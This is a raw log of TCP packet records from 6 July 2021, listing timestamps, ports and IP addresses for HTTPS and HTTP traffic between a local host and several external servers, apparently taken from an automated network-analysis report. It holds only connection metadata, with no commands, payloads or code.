Jul 6, 2021 14:30:28.485398054 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.485570908 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.531127930 CEST	443	49826	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.531169891 CEST	443	49827	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.531819105 CEST	443	49826	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.531877995 CEST	443	49827	195.20.250.115	192.168.2.4
Jul 6, 2021 14:30:28.531981945 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.532021046 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.707719088 CEST	49809	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:28.707886934 CEST	49808	80	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:28.708043098 CEST	49810	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:28.708077908 CEST	49811	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:28.708256960 CEST	49821	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:28.708817005 CEST	49822	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:28.708841085 CEST	49826	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:28.709034920 CEST	49827	443	192.168.2.4	195.20.250.115
Jul 6, 2021 14:30:35.788973093 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:35.789150000 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:35.968311071 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:35.968677044 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:35.972595930 CEST	443	49831	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:35.972960949 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:35.991375923 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:35.991455078 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.173521996 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.173557997 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.173578978 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.173652887 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.173702955 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.176600933 CEST	443	49831	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.176629066 CEST	443	49831	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.176651955 CEST	443	49831	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.176688910 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.176704884 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.176707983 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.217442036 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.218281984 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.223437071 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.397829056 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.397913933 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.401640892 CEST	443	49831	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.402611971 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.405352116 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.405612946 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.405627012 CEST	49830	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:36.482935905 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.485712051 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.532701969 CEST	443	49832	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.532733917 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.532852888 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.532855034 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.543241024 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.543245077 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.584949017 CEST	443	49830	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:36.591262102 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.591398954 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.591432095 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.591509104 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.592076063 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.594000101 CEST	443	49832	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.594028950 CEST	443	49832	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.594053030 CEST	443	49832	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.594157934 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.595340014 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.606550932 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.607362986 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.613569021 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.656512976 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.656563997 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.656647921 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.660723925 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.660834074 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.669414043 CEST	443	49832	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.670149088 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.674931049 CEST	49833	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:36.726077080 CEST	443	49833	40.101.136.2	192.168.2.4
Jul 6, 2021 14:30:36.802500963 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.802747965 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.849050999 CEST	443	49834	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.849108934 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.849159002 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.849240065 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.850927114 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.851058006 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.899080038 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.899087906 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.899091005 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.899245024 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.899264097 CEST	443	49834	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.899292946 CEST	443	49834	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.899368048 CEST	443	49834	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.899415970 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.899429083 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.899523020 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.914501905 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.915263891 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.915957928 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.961918116 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.961991072 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.962165117 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.964143038 CEST	443	49834	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.964236975 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:36.991300106 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.991334915 CEST	443	49835	52.97.233.34	192.168.2.4
Jul 6, 2021 14:30:36.991703033 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:37.121212959 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.122117996 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.164944887 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.164968967 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.165322065 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.168442011 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.175040960 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.175499916 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.218967915 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.218997002 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219063997 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219216108 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219235897 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219259977 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219286919 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219306946 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.219355106 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.219449997 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.219474077 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.265156984 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.265431881 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.283741951 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.283942938 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.284033060 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.309930086 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.309956074 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.309972048 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.309987068 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.310002089 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.310024023 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.310075998 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.310106039 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.310287952 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.312794924 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.312918901 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.327729940 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.327759027 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.327776909 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.327791929 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.327897072 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.328766108 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.328793049 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.328851938 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.329336882 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:37.358099937 CEST	443	49836	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.358124971 CEST	443	49837	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:37.403618097 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.403815031 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.448426962 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.448453903 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.448559999 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.449888945 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.451138973 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.451380968 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.497349024 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.497375965 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.497921944 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.497947931 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.497968912 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.498033047 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.498053074 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.498136997 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.498162985 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.498179913 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.498193979 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.498228073 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.503123045 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.503422976 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.503894091 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.506124020 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.515995979 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.549817085 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.549860001 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.549879074 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.550111055 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.550297022 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.550332069 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.551196098 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.551254988 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.552570105 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.552812099 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.552846909 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.552936077 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.559250116 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.562058926 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.562145948 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.562587976 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.574341059 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574383974 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574410915 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574446917 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574465990 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574484110 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574506998 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574529886 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574552059 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574552059 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.574573994 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.574577093 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574601889 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574616909 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.574626923 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574651957 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574676991 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.574687004 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.574693918 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.574893951 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.594356060 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.594388962 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.594511986 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.594579935 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.595485926 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.595535040 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.596874952 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.603607893 CEST	443	49838	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.619018078 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:37.619153023 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:37.824075937 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.824317932 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.894083023 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:37.894104004 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:37.894279957 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.894279957 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.895298004 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.918704033 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.965287924 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:37.985889912 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:37.985908031 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:37.985919952 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:37.986005068 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.986020088 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:37.989991903 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.004400969 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.004961014 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.005232096 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.009619951 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.009643078 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.009654999 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.009748936 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.013067007 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.013376951 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.072911024 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.074976921 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.075017929 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.075021029 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.075153112 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.075273037 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.076488972 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.083687067 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.083724022 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.083818913 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.085633039 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.087614059 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.087699890 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.100236893 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.100294113 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.100315094 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.100334883 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.100788116 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.107647896 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.107682943 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.107753038 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.107773066 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.112468958 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.112479925 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.113224030 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.117546082 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.117551088 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.119862080 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.134732962 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.134757042 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.134830952 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.134845972 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.138199091 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.138226032 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.138288021 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.142188072 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.142210960 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.142275095 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.142292023 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.146955013 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.160336018 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.160371065 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.160450935 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.160476923 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.160979986 CEST	443	49846	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.163057089 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.163089991 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.163187027 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.167685986 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.167709112 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.167751074 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.167773962 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.172564983 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.172601938 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.172789097 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.178487062 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.178524017 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.178603888 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.178626060 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.182642937 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.182676077 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.182730913 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.182751894 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.188205004 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.188281059 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.188633919 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:38.252892971 CEST	443	49845	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:38.362742901 CEST	49831	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:38.363032103 CEST	49832	443	192.168.2.4	40.101.136.2
Jul 6, 2021 14:30:38.363082886 CEST	49834	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:38.363725901 CEST	49835	443	192.168.2.4	52.97.233.34
Jul 6, 2021 14:30:38.524219036 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.524259090 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.546046019 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.566457987 CEST	443	49850	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.566476107 CEST	443	49849	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.566549063 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.566600084 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.567166090 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.569549084 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.582530975 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.583338022 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.590203047 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.609371901 CEST	443	49849	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613142967 CEST	443	49849	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613161087 CEST	443	49849	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613174915 CEST	443	49849	82.165.229.54	192.168.2.4
